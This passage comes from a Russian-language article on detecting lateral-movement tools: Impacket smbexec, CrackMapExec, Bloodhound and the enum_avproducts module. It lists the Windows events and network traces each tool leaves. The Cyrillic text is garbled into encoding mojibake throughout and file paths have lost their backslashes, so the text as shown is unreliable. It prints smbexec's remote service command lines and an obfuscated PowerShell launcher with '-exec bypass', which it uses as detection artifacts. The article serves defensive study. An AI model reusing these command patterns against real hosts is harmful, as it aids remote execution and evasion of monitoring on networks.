ΠΠ°ΠΊ ΠΈ Ρ ΠΌΠ½ΠΎΠ³ΠΈΡ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠΎΠ² Π΄Π»Ρ ΠΏΠΎΡΡΡΠΊΡΠΏΠ»ΡΠ°ΡΠ°ΡΠΈΠΈ, Ρ Impacket Π΅ΡΡΡ ΠΌΠΎΠ΄ΡΠ»ΠΈ Π΄Π»Ρ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠΌΠ°Π½Π΄. ΠΡ ΠΎΡΡΠ°Π½ΠΎΠ²ΠΈΠΌΡΡ Π½Π° smbexec, ΠΊΠΎΡΠΎΡΡΠΉ Π΄Π°Π΅Ρ ΠΈΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΡΡ ΠΎΠ±ΠΎΠ»ΠΎΡΠΊΡ Π½Π° ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ ΠΌΠ°ΡΠΈΠ½Π΅. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ ΠΌΠΎΠ΄ΡΠ»Ρ ΡΠ°ΠΊΠΆΠ΅ ΡΡΠ΅Π±ΡΠ΅ΡΡΡ Π°ΡΡΠ΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΈΡ ΡΠ΅ΡΠ΅Π· SMB Π»ΠΈΠ±ΠΎ ΠΏΠ°ΡΠΎΠ»Π΅ΠΌ, Π»ΠΈΠ±ΠΎ Π΅Π³ΠΎ Ρ Π΅ΡΠ΅ΠΌ. ΠΠ° ΡΠΈΡ. 3 ΠΌΡ Π²ΠΈΠ΄ΠΈΠΌ ΠΏΡΠΈΠΌΠ΅Ρ ΡΠ°Π±ΠΎΡΡ ΡΠ°ΠΊΠΎΠ³ΠΎ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠ°, Π² Π΄Π°Π½Π½ΠΎΠΌ ΡΠ»ΡΡΠ°Π΅ ΡΡΠΎ ΠΊΠΎΠ½ΡΠΎΠ»Ρ Π»ΠΎΠΊΠ°Π»ΡΠ½ΠΎΠ³ΠΎ Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡΠ°.
Π ΠΈΡ. 3. ΠΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½Π°Ρ ΠΊΠΎΠ½ΡΠΎΠ»Ρ smbexec
ΠΠ΅ΡΠ²ΡΠΌ ΡΡΠ°ΠΏΠΎΠΌ ΡΠ°Π±ΠΎΡΡ smbexec ΠΏΠΎΡΠ»Π΅ Π°ΡΡΠ΅Π½ΡΠΈΡΠΈΠΊΠ°ΡΠΈΠΈ ΡΠ²Π»ΡΠ΅ΡΡΡ ΠΎΡΠΊΡΡΡΠΈΠ΅ SCM ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ OpenSCManagerW (15). ΠΠ°ΠΏΡΠΎΡ ΠΏΡΠΈΠΌΠ΅ΡΠ°ΡΠ΅Π»Π΅Π½: Π² Π½Π΅ΠΌ ΠΏΠΎΠ»Π΅ MachineName ΠΈΠΌΠ΅Π΅Ρ Π·Π½Π°ΡΠ΅Π½ΠΈΠ΅ DUMMY.
Π ΠΈΡ. 4. ΠΠ°ΠΏΡΠΎΡ Π½Π° ΠΎΡΠΊΡΡΡΠΈΠ΅ Service Control Manager
ΠΠ°Π»Π΅Π΅ ΠΏΡΠΎΠΈΡΡ ΠΎΠ΄ΠΈΡ ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΡΠ΅ΡΠ²ΠΈΡΠ° Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ CreateServiceW (12). Π ΡΠ»ΡΡΠ°Π΅ smbexec ΠΌΡ ΠΌΠΎΠΆΠ΅ΠΌ Π²ΠΈΠ΄Π΅ΡΡ ΠΊΠ°ΠΆΠ΄ΡΠΉ ΡΠ°Π· ΠΎΠ΄ΠΈΠ½Π°ΠΊΠΎΠ²ΡΡ Π»ΠΎΠ³ΠΈΠΊΡ ΠΏΠΎΡΡΡΠΎΠ΅Π½ΠΈΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ. ΠΠ° ΡΠΈΡ. 5 Π·Π΅Π»Π΅Π½ΡΠΌ ΡΠ²Π΅ΡΠΎΠΌ ΠΎΡΠΌΠ΅ΡΠ΅Π½Ρ Π½Π΅ΠΈΠ·ΠΌΠ΅Π½ΡΠ΅ΠΌΡΠ΅ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ, ΠΆΠ΅Π»ΡΡΠΌ β ΡΠΎ, ΡΡΠΎ Π°ΡΠ°ΠΊΡΡΡΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ ΠΈΠ·ΠΌΠ΅Π½ΠΈΡΡ. ΠΠ΅ΡΡΡΠ΄Π½ΠΎ Π·Π°ΠΌΠ΅ΡΠΈΡΡ, ΡΡΠΎ ΠΈΠΌΡ ΠΈΡΠΏΠΎΠ»Π½ΡΠ΅ΠΌΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°, Π΅Π³ΠΎ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡ ΠΈ ΡΠ°ΠΉΠ» output ΠΈΠ·ΠΌΠ΅Π½ΠΈΡΡ ΠΌΠΎΠΆΠ½ΠΎ, Π½ΠΎ ΠΎΡΡΠ°Π²ΡΠ΅Π΅ΡΡ ΠΏΠΎΠΌΠ΅Π½ΡΡΡ ΠΊΡΠ΄Π° ΡΠ»ΠΎΠΆΠ½Π΅Π΅, Π½Π΅ Π½Π°ΡΡΡΠ°Ρ Π»ΠΎΠ³ΠΈΠΊΡ ΡΠ°Π±ΠΎΡΡ ΠΌΠΎΠ΄ΡΠ»Ρ Impacket.
Π ΠΈΡ. 5. ΠΠ°ΠΏΡΠΎΡ Π½Π° ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΡΠ΅ΡΠ²ΠΈΡΠ° Ρ ΠΏΠΎΠΌΠΎΡΡΡ Service Control Manager
Smbexec ΡΠ°ΠΊΠΆΠ΅ ΠΎΡΡΠ°Π²Π»ΡΠ΅Ρ ΡΠ²Π½ΡΠ΅ ΡΠ»Π΅Π΄Ρ Π² ΠΆΡΡΠ½Π°Π»Π΅ ΡΠΎΠ±ΡΡΠΈΠΉ Windows. Π ΠΆΡΡΠ½Π°Π»Π΅ Windows Server 2016 Π΄Π»Ρ ΠΈΠ½ΡΠ΅ΡΠ°ΠΊΡΠΈΠ²Π½ΠΎΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ ΠΎΠ±ΠΎΠ»ΠΎΡΠΊΠΈ Ρ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ ipconfig ΡΠ²ΠΈΠ΄ΠΈΠΌ ΡΠ»Π΅Π΄ΡΡΡΡΡ ΠΊΠ»ΡΡΠ΅Π²ΡΡ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°ΡΠ΅Π»ΡΠ½ΠΎΡΡΡ ΡΠΎΠ±ΡΡΠΈΠΉ:
1. 4697 β ΡΡΡΠ°Π½ΠΎΠ²ΠΊΠ° ΡΠ΅ΡΠ²ΠΈΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° cmd.exe Ρ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠ°ΠΌΠΈ ΠΈΠ· ΠΏΡΠ½ΠΊΡΠ° 1.
3. 5145 β ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° ΠΏΡΠ°Π² Π΄ΠΎΡΡΡΠΏΠ° ΠΊ ΡΠ°ΠΉΠ»Ρ __output Π² Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ C$.
4. 4697 β ΡΡΡΠ°Π½ΠΎΠ²ΠΊΠ° ΡΠ΅ΡΠ²ΠΈΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 β ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΏΡΠΎΡΠ΅ΡΡΠ° cmd.exe Ρ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠ°ΠΌΠΈ ΠΈΠ· ΠΏΡΠ½ΠΊΡΠ° 4.
6. 5145 β ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° ΠΏΡΠ°Π² Π΄ΠΎΡΡΡΠΏΠ° ΠΊ ΡΠ°ΠΉΠ»Ρ __output Π² Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΠΈ C$.
Impacket ΡΠ²Π»ΡΠ΅ΡΡΡ ΠΎΡΠ½ΠΎΠ²ΠΎΠΉ Π΄Π»Ρ ΡΠ°Π·ΡΠ°Π±ΠΎΡΠΊΠΈ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠΎΠ² Π΄Π»Ρ Π°ΡΠ°ΠΊ. ΠΠ½ ΠΏΠΎΠ΄Π΄Π΅ΡΠΆΠΈΠ²Π°Π΅Ρ ΠΏΠΎΡΡΠΈ Π²ΡΠ΅ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Ρ Π² Windows-ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ΅ ΠΈ ΠΏΡΠΈ ΡΡΠΎΠΌ ΠΈΠΌΠ΅Π΅Ρ ΡΠ²ΠΎΠΈ Ρ Π°ΡΠ°ΠΊΡΠ΅ΡΠ½ΡΠ΅ ΠΎΡΠΎΠ±Π΅Π½Π½ΠΎΡΡΠΈ. ΠΠ΄Π΅ΡΡ ΠΈ ΠΊΠΎΠ½ΠΊΡΠ΅ΡΠ½ΡΠ΅ winreg-Π·Π°ΠΏΡΠΎΡΡ, ΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ SCM API Ρ Ρ Π°ΡΠ°ΠΊΡΠ΅ΡΠ½ΡΠΌ ΡΠΎΡΠΌΠΈΡΠΎΠ²Π°Π½ΠΈΠ΅ΠΌ ΠΊΠΎΠΌΠ°Π½Π΄, ΠΈ ΡΠΎΡΠΌΠ°Ρ ΠΈΠΌΠ΅Π½ ΡΠ°ΠΉΠ»ΠΎΠ², ΠΈ SMB share SYSTEM32.
CRACKMAPEXEC
ΠΠ½ΡΡΡΡΠΌΠ΅Π½Ρ CME ΠΏΡΠΈΠ·Π²Π°Π½ Π² ΠΏΠ΅ΡΠ²ΡΡ ΠΎΡΠ΅ΡΠ΅Π΄Ρ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΠΎΠ²Π°ΡΡ ΡΠ΅ ΡΡΡΠΈΠ½Π½ΡΠ΅ Π΄Π΅ΠΉΡΡΠ²ΠΈΡ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΏΡΠΈΡ ΠΎΠ΄ΠΈΡΡΡ Π²ΡΠΏΠΎΠ»Π½ΡΡΡ Π°ΡΠ°ΠΊΡΡΡΠ΅ΠΌΡ Π΄Π»Ρ ΠΏΡΠΎΠ΄Π²ΠΈΠΆΠ΅Π½ΠΈΡ Π²Π½ΡΡΡΠΈ ΡΠ΅ΡΠΈ. ΠΠ½ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ ΡΠ°Π±ΠΎΡΠ°ΡΡ Π² ΡΠ²ΡΠ·ΠΊΠ΅ Ρ Π½Π΅Π±Π΅Π·ΡΠ·Π²Π΅ΡΡΠ½ΡΠΌΠΈ Empire agent ΠΈ Meterpreter. Π§ΡΠΎΠ±Ρ Π²ΡΠΏΠΎΠ»Π½ΡΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ ΡΠΊΡΡΡΠ½ΠΎ, CME ΠΌΠΎΠΆΠ΅Ρ ΠΈΡ ΠΎΠ±ΡΡΡΡΠΈΡΠΎΠ²Π°ΡΡ. ΠΡΠΏΠΎΠ»ΡΠ·ΡΡ Bloodhound (ΠΎΡΠ΄Π΅Π»ΡΠ½ΡΠΉ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ Π΄Π»Ρ ΠΏΡΠΎΠ²Π΅Π΄Π΅Π½ΠΈΡ ΡΠ°Π·Π²Π΅Π΄ΠΊΠΈ), Π°ΡΠ°ΠΊΡΡΡΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΠΎΠ²Π°ΡΡ ΠΏΠΎΠΈΡΠΊ Π°ΠΊΡΠΈΠ²Π½ΠΎΠΉ ΡΠ΅ΡΡΠΈΠΈ Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ³ΠΎ Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡΠ°.
Bloodhound
Bloodhound ΠΊΠ°ΠΊ ΡΠ°ΠΌΠΎΡΡΠΎΡΡΠ΅Π»ΡΠ½ΡΠΉ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Π²Π΅ΡΡΠΈ ΠΏΡΠΎΠ΄Π²ΠΈΠ½ΡΡΡΡ ΡΠ°Π·Π²Π΅Π΄ΠΊΡ Π²Π½ΡΡΡΠΈ ΡΠ΅ΡΠΈ. ΠΠ½ ΡΠΎΠ±ΠΈΡΠ°Π΅Ρ Π΄Π°Π½Π½ΡΠ΅ ΠΎ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΡΡ , ΠΌΠ°ΡΠΈΠ½Π°Ρ , Π³ΡΡΠΏΠΏΠ°Ρ , ΡΠ΅ΡΡΠΈΡΡ ΠΈ ΠΏΠΎΡΡΠ°Π²Π»ΡΠ΅ΡΡΡ Π² Π²ΠΈΠ΄Π΅ ΡΠΊΡΠΈΠΏΡΠ° Π½Π° PowerShell ΠΈΠ»ΠΈ Π±ΠΈΠ½Π°ΡΠ½ΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°. ΠΠ»Ρ ΡΠ±ΠΎΡΠ° ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡΡΡΡ LDAP ΠΈΠ»ΠΈ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»Ρ, Π±Π°Π·ΠΈΡΡΡΡΠΈΠ΅ΡΡ Π½Π° SMB. ΠΠ½ΡΠ΅Π³ΡΠ°ΡΠΈΠΎΠ½Π½ΡΠΉ ΠΌΠΎΠ΄ΡΠ»Ρ CME ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Π·Π°Π³ΡΡΠΆΠ°ΡΡ Bloodhound Π½Π° ΠΌΠ°ΡΠΈΠ½Ρ ΠΆΠ΅ΡΡΠ²Ρ, Π·Π°ΠΏΡΡΠΊΠ°ΡΡ ΠΈ ΠΏΠΎΠ»ΡΡΠ°ΡΡ ΡΠΎΠ±ΡΠ°Π½Π½ΡΠ΅ Π΄Π°Π½Π½ΡΠ΅ ΠΏΠΎΡΠ»Π΅ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ, ΡΠ΅ΠΌ ΡΠ°ΠΌΡΠΌ Π°Π²ΡΠΎΠΌΠ°ΡΠΈΠ·ΠΈΡΡΡ Π΄Π΅ΠΉΡΡΠ²ΠΈΡ Π² ΡΠΈΡΡΠ΅ΠΌΠ΅ ΠΈ Π΄Π΅Π»Π°Ρ ΠΈΡ ΠΌΠ΅Π½Π΅Π΅ Π·Π°ΠΌΠ΅ΡΠ½ΡΠΌΠΈ. ΠΡΠ°ΡΠΈΡΠ΅ΡΠΊΠ°Ρ ΠΎΠ±ΠΎΠ»ΠΎΡΠΊΠ° Bloodhound ΠΏΡΠ΅Π΄ΡΡΠ°Π²Π»ΡΠ΅Ρ ΡΠΎΠ±ΡΠ°Π½Π½ΡΠ΅ Π΄Π°Π½Π½ΡΠ΅ Π² Π²ΠΈΠ΄Π΅ Π³ΡΠ°ΡΠΎΠ², ΡΡΠΎ ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Π½Π°ΠΉΡΠΈ ΠΊΡΠ°ΡΡΠ°ΠΉΡΠΈΠΉ ΠΏΡΡΡ ΠΎΡ ΠΌΠ°ΡΠΈΠ½Ρ Π°ΡΠ°ΠΊΡΡΡΠ΅Π³ΠΎ Π΄ΠΎ Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ³ΠΎ Π°Π΄ΠΌΠΈΠ½ΠΈΡΡΡΠ°ΡΠΎΡΠ°.
Π ΠΈΡ. 6. ΠΠ½ΡΠ΅ΡΡΠ΅ΠΉΡ Bloodhound
ΠΠ»Ρ Π·Π°ΠΏΡΡΠΊΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ ΠΌΠΎΠ΄ΡΠ»Ρ ΡΠΎΠ·Π΄Π°Π΅Ρ Π·Π°Π΄Π°ΡΡ, ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡ ATSVC ΠΈ SMB. ATSVC ΡΠ²Π»ΡΠ΅ΡΡΡ ΠΈΠ½ΡΠ΅ΡΡΠ΅ΠΉΡΠΎΠΌ Π΄Π»Ρ ΡΠ°Π±ΠΎΡΡ Ρ ΠΏΠ»Π°Π½ΠΈΡΠΎΠ²ΡΠΈΠΊΠΎΠΌ Π·Π°Π΄Π°Ρ Windows. CME ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠ΅Ρ Π΅Π³ΠΎ ΡΡΠ½ΠΊΡΠΈΡ NetrJobAdd (1) Π΄Π»Ρ ΡΠΎΠ·Π΄Π°Π½ΠΈΡ Π·Π°Π΄Π°Ρ ΠΏΠΎ ΡΠ΅ΡΠΈ. ΠΡΠΈΠΌΠ΅Ρ ΡΠΎΠ³ΠΎ, ΡΡΠΎ ΠΎΡΠΏΡΠ°Π²Π»ΡΠ΅Ρ ΠΌΠΎΠ΄ΡΠ»Ρ CME, ΠΏΠΎΠΊΠ°Π·Π°Π½ Π½Π° ΡΠΈΡ. 7: ΡΡΠΎ Π²ΡΠ·ΠΎΠ² ΠΊΠΎΠΌΠ°Π½Π΄Ρ cmd.exe ΠΈ ΠΎΠ±ΡΡΡΡΠΈΡΠΎΠ²Π°Π½Π½ΡΠΉ ΠΊΠΎΠ΄ Π² Π²ΠΈΠ΄Π΅ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΎΠ² Π² ΡΠΎΡΠΌΠ°ΡΠ΅ XML.
Π ΠΈΡ.7. Π‘ΠΎΠ·Π΄Π°Π½ΠΈΠ΅ Π·Π°Π΄Π°ΡΠΈ ΡΠ΅ΡΠ΅Π· CME
ΠΠΎΡΠ»Π΅ ΡΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π·Π°Π΄Π°ΡΠ° ΠΏΠΎΡΡΡΠΏΠΈΠ»Π° Π½Π° ΠΈΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅, ΠΌΠ°ΡΠΈΠ½Π° ΠΆΠ΅ΡΡΠ²Ρ Π·Π°ΠΏΡΡΠΊΠ°Π΅Ρ ΡΠ°ΠΌ Bloodhound, ΠΈ Π² ΡΡΠ°ΡΠΈΠΊΠ΅ ΡΡΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΡΠ²ΠΈΠ΄Π΅ΡΡ. ΠΠ»Ρ ΠΌΠΎΠ΄ΡΠ»Ρ Ρ Π°ΡΠ°ΠΊΡΠ΅ΡΠ½Ρ LDAP-Π·Π°ΠΏΡΠΎΡΡ Π΄Π»Ρ ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΡ ΡΡΠ°Π½Π΄Π°ΡΡΠ½ΡΡ Π³ΡΡΠΏΠΏ, ΡΠΏΠΈΡΠΊΠ° Π²ΡΠ΅Ρ ΠΌΠ°ΡΠΈΠ½ ΠΈ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Π΅ΠΉ Π² Π΄ΠΎΠΌΠ΅Π½Π΅, ΠΏΠΎΠ»ΡΡΠ΅Π½ΠΈΠ΅ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ ΠΎΠ± Π°ΠΊΡΠΈΠ²Π½ΡΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΡΡΠΊΠΈΡ ΡΠ΅ΡΡΠΈΡΡ ΡΠ΅ΡΠ΅Π· Π·Π°ΠΏΡΠΎΡ SRVSVC NetSessEnum.
Π ΠΈΡ. 8. ΠΠΎΠ»ΡΡΠ΅Π½ΠΈΠ΅ ΡΠΏΠΈΡΠΊΠ° Π°ΠΊΡΠΈΠ²Π½ΡΡ
ΡΠ΅ΡΡΠΈΠΉ ΡΠ΅ΡΠ΅Π· SMB
ΠΡΠΎΠΌΠ΅ ΡΠΎΠ³ΠΎ, Π·Π°ΠΏΡΡΠΊ Bloodhound Π½Π° ΠΌΠ°ΡΠΈΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ Ρ Π²ΠΊΠ»ΡΡΠ΅Π½Π½ΡΠΌ Π°ΡΠ΄ΠΈΡΠΎΠΌ ΡΠΎΠΏΡΠΎΠ²ΠΎΠΆΠ΄Π°Π΅ΡΡΡ ΡΠΎΠ±ΡΡΠΈΠ΅ΠΌ Ρ ID 4688 (ΡΠΎΠ·Π΄Π°Π½ΠΈΡ ΠΏΡΠΎΡΠ΅ΡΡΠ°) ΠΈ ΠΈΠΌΠ΅Π½Π΅ΠΌ ΠΏΡΠΎΡΠ΅ΡΡΠ° Β«C:WindowsSystem32cmd.exeΒ»
. ΠΡΠΈΠΌΠ΅ΡΠ°ΡΠ΅Π»ΡΠ½ΡΠΌ Π² Π½Π΅ΠΌ ΡΠ²Π»ΡΡΡΡΡ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ ΡΡΡΠΎΠΊΠΈ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "
Enum_avproducts
ΠΠ΅ΡΡΠΌΠ° ΠΈΠ½ΡΠ΅ΡΠ΅ΡΠ΅Π½ Ρ ΡΠΎΡΠΊΠΈ Π·ΡΠ΅Π½ΠΈΡ ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»ΡΠ½ΠΎΡΡΠΈ ΠΈ ΡΠ΅Π°Π»ΠΈΠ·Π°ΡΠΈΠΈ ΠΌΠΎΠ΄ΡΠ»Ρ enum_avproducts. WMI ΠΏΠΎΠ·Π²ΠΎΠ»ΡΠ΅Ρ Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΡΠ·ΡΠΊΠ° Π·Π°ΠΏΡΠΎΡΠΎΠ² WQL ΠΏΠΎΠ»ΡΡΠ°ΡΡ Π΄Π°Π½Π½ΡΠ΅ ΡΠ°Π·Π»ΠΈΡΠ½ΡΡ ΠΎΠ±ΡΠ΅ΠΊΡΠΎΠ² Windows, ΡΠ΅ΠΌ ΠΏΠΎ ΡΡΡΠΈ ΠΈ ΠΏΠΎΠ»ΡΠ·ΡΠ΅ΡΡΡ ΡΡΠΎΡ ΠΌΠΎΠ΄ΡΠ»Ρ CME. ΠΠ½ Π³Π΅Π½Π΅ΡΠΈΡΡΠ΅Ρ Π·Π°ΠΏΡΠΎΡΡ ΠΊ ΠΊΠ»Π°ΡΡΠ°ΠΌ AntiSpywareProduct ΠΈ AntiΠirusProduct ΠΎ ΡΡΠ΅Π΄ΡΡΠ²Π°Ρ Π·Π°ΡΠΈΡΡ, ΡΡΡΠ°Π½ΠΎΠ²Π»Π΅Π½Π½ΡΡ Π½Π° ΠΌΠ°ΡΠΈΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ. ΠΠ»Ρ ΡΠΎΠ³ΠΎ ΡΡΠΎΠ±Ρ ΠΏΠΎΠ»ΡΡΠΈΡΡ Π½ΡΠΆΠ½ΡΠ΅ Π΄Π°Π½Π½ΡΠ΅, ΠΌΠΎΠ΄ΡΠ»Ρ Π²ΡΠΏΠΎΠ»Π½ΡΠ΅Ρ ΠΏΠΎΠ΄ΠΊΠ»ΡΡΠ΅Π½ΠΈΠ΅ ΠΊ ΠΏΡΠΎΡΡΡΠ°Π½ΡΡΠ²Ρ ΠΈΠΌΠ΅Π½ rootSecurityCenter2, Π·Π°ΡΠ΅ΠΌ ΡΠΎΡΠΌΠΈΡΡΠ΅Ρ WQL-Π·Π°ΠΏΡΠΎΡ ΠΈ ΠΏΠΎΠ»ΡΡΠ°Π΅Ρ ΠΎΡΠ²Π΅Ρ. ΠΠ° ΡΠΈΡ. 9 ΠΏΠΎΠΊΠ°Π·Π°Π½ΠΎ ΡΠΎΠ΄Π΅ΡΠΆΠΈΠΌΠΎΠ΅ ΡΠ°ΠΊΠΈΡ Π·Π°ΠΏΡΠΎΡΠΎΠ² ΠΈ ΠΎΡΠ²Π΅ΡΠΎΠ². Π Π½Π°ΡΠ΅ΠΌ ΠΏΡΠΈΠΌΠ΅ΡΠ΅ Π½Π°ΡΠ΅Π»ΡΡ Windows Defender.
Π ΠΈΡ. 9. Π‘Π΅ΡΠ΅Π²Π°Ρ Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΡ ΠΌΠΎΠ΄ΡΠ»Ρ enum_avproducts
ΠΠ°ΡΠ°ΡΡΡΡ Π°ΡΠ΄ΠΈΡ WMI (Trace WMI-Activity), Π² ΡΠΎΠ±ΡΡΠΈΡΡ ΠΊΠΎΡΠΎΡΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡΠΈ ΠΏΠΎΠ»Π΅Π·Π½ΡΡ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΡ ΠΎ WQL-Π·Π°ΠΏΡΠΎΡΠ°Ρ , ΠΌΠΎΠΆΠ΅Ρ ΠΎΠΊΠ°Π·Π°ΡΡΡΡ Π²ΡΠΊΠ»ΡΡΠ΅Π½Π½ΡΠΌ. ΠΠΎ Π΅ΡΠ»ΠΈ ΠΎΠ½ Π²ΠΊΠ»ΡΡΠ΅Π½, ΡΠΎ Π² ΡΠ»ΡΡΠ°Π΅ Π·Π°ΠΏΡΡΠΊΠ° ΡΡΠ΅Π½Π°ΡΠΈΡ enum_avproducts ΡΠΎΡ ΡΠ°Π½ΠΈΡΡΡ ΡΠΎΠ±ΡΡΠΈΠ΅ Ρ ID 11. Π Π½Π΅ΠΌ Π±ΡΠ΄Π΅Ρ ΡΠΎΠ΄Π΅ΡΠΆΠ°ΡΡΡΡ ΠΈΠΌΡ ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»Ρ, ΠΊΠΎΡΠΎΡΡΠΉ ΠΎΡΠΏΡΠ°Π²ΠΈΠ» Π·Π°ΠΏΡΠΎΡ, ΠΈ ΠΈΠΌΡ Π² ΠΏΡΠΎΡΡΡΠ°Π½ΡΡΠ²Π΅ ΠΈΠΌΠ΅Π½ rootSecurityCenter2.
Π£ ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ ΠΈΠ· ΠΌΠΎΠ΄ΡΠ»Π΅ΠΉ CME ΠΎΠ±Π½Π°ΡΡΠΆΠΈΠ»ΠΈΡΡ ΡΠ²ΠΎΠΈ Π°ΡΡΠ΅ΡΠ°ΠΊΡΡ, Π±ΡΠ΄Ρ ΡΠΎ ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ΅ΡΠΊΠΈΠ΅ WQL-Π·Π°ΠΏΡΠΎΡΡ ΠΈΠ»ΠΈ ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΎΠΏΡΠ΅Π΄Π΅Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΠΈΠ΄Π° Π·Π°Π΄Π°ΡΠΈ Π² task scheduler Ρ ΠΎΠ±ΡΡΡΠΊΠ°ΡΠΈΠ΅ΠΉ ΠΈ Ρ Π°ΡΠ°ΠΊΡΠ΅ΡΠ½Π°Ρ Π΄Π»Ρ Bloodhound Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΡ Π² LDAP ΠΈ SMB.
KOADIC
